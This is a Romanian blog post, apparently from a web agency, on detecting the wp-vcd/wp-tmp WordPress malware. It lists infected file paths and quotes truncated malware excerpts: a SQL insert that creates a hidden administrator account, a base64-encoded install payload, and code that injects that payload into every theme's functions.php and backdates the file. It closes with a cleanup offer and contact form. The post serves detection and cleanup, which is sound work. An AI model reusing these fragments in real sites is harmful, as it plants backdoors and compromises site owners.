WordPress Malware: wp-vcd, wp-tmp

WordPress Malware: wp-vcd, wp-tmp

Malicious code injection inside a wordpress theme’s functions.php and wp-includes editing posts content.

Tu știi dacă ai site-ul virusat?

Întâmplător am descoperit câteva linii de cod care nu aveau ce căuta acolo într-un site create în wordpress. Credeam că dacă folosesc plugin-uri descărcate direct de pe site-ul wordpress sunt ferit de astfel de suprize neplăcute.

Am verificat să vedem ce sunt și ce fac acele linii de cod. Rezultatul nu este deloc unul bun. Așadar, am căut o rezolvare pe internet. Rezultatul a fost multe topicuri și nicio rezolvare concretă. Așadar, mi-am facut un script care identifică și șterge elementele virusate.

Verificare web daca site-ul este infectat

Pasul 1 – Se verifica direct in link-ul site-ului:

  • http://site/wp-includes/class.wp.php
  • http://site/wp-includes/wp-tmp.php
  • http://site/wp-includes/wp-vcd.php

Dacă

  • se încarcă o pagină goala, atunci site-ul este infectat
  • se încarcă o pagină 404, atunci site-ul nu este infectat

Pasul 3 – Se verifică direct pe HDD dacă exista aceste fișiere si dacă conține codul suspect.

Cum ne dăm seama dacă site-ul este într-adevăr infectat?

Se verifică dacă există fișierele și cod suspect:

  • /wp-includes/class.wp.php

$wpdb->query(“INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (‘100010010’, ‘100010010’, ‘\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.’, ‘100010010’, ‘te@ea.st‘, ”, ‘2011-06-07 00:00:00’, ”, ‘0’, ‘100010010’);”);

  • /wp-includes/wp-tmp.php
  • cod prezent la începutul fișierului /wp-includes/wp-vcd.php

$install_code = ‘PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pIC[…]
$install_hash = md5($_SERVER[‘HTTP_HOST’] . AUTH_SALT);
$install_code = str_replace(‘{$PASSWORD}’ , $install_hash, base64_decode( $install_code ));

  • cod prezent la inceputul fisierului /wp-includes/post.php
  • cod prezent in fisierul functions.php din fiecare tema in site.

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’)){
if (strpos($content, ‘WP_V_CD’) === false){
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’, $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );
}
else { $ping = false; }
}

 

foreach ($wpdb->get_results(‘SELECT * FROM `’ . $wpdb->prefix . ‘posts` WHERE `post_status` = “publish” AND `post_type` = “post” ORDER BY `ID` DESC’, ARRAY_A) as $data)
[…]
$post_content = preg_replace(‘!<div id=”‘.$div_code_name.'”>(.*?)</div>!s’, ”, $data -> post_content);
[…]
$file = preg_replace(‘/’.$matcholddiv[1][0].’/i’,$_REQUEST[‘newdiv’], $file);
[…]
$file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);

if ($wpdb -> query(‘INSERT INTO `’ . $wpdb->prefix . ‘datalist` SET `url` = “/’.mysql_escape_string($_REQUEST[‘url’]).'”, `title` = “‘.mysql_escape_string($_REQUEST[‘title’]).'”, `keywords` = “‘.mysql_escape_string($_REQUEST[‘keywords’]).'”, `description` = “‘.mysql_escape_string($_REQUEST[‘description’]).'”, `content` = “‘.mysql_escape_string($_REQUEST[‘content’]).'”, `full_content` = “‘.mysql_escape_string($_REQUEST[‘full_content’]).'” ON DUPLICATE KEY UPDATE `title` = “‘.mysql_escape_string($_REQUEST[‘title’]).'”, `keywords` = “‘.mysql_escape_string($_REQUEST[‘keywords’]).'”, `description` = “‘.mysql_escape_string($_REQUEST[‘description’]).'”, `content` = “‘.mysql_escape_string(urldecode($_REQUEST[‘content’])).'”, `full_content` = “‘.mysql_escape_string($_REQUEST[‘full_content’]).'”‘))

Soluție devirusare site

LISAL a dezvoltat un script care analizează dacă există acest cod malițions și îl elimina din toate fișierele site-ului.

Contacteaza-ne la telefon+4 077 05 78 155 sau pe office@lisal.ro dacă ai o suspiciune că site-ul este virusat.

Info malware

  • https://exchange.xforce.ibmcloud.com/collection/wp-vcd-Wordpress-Malware-48ec32a4fc42026dafd9545a237d1e5e
Sunteți deciși să faceți o schimbare?

Doriți să vă contactăm și să vă oferim mai multe detalii? Vă rugăm sa completați câmpurile de mai jos iar unul dintre membrii echipei noastre vă va contacta în cel mai scurt timp.

X
CONTACT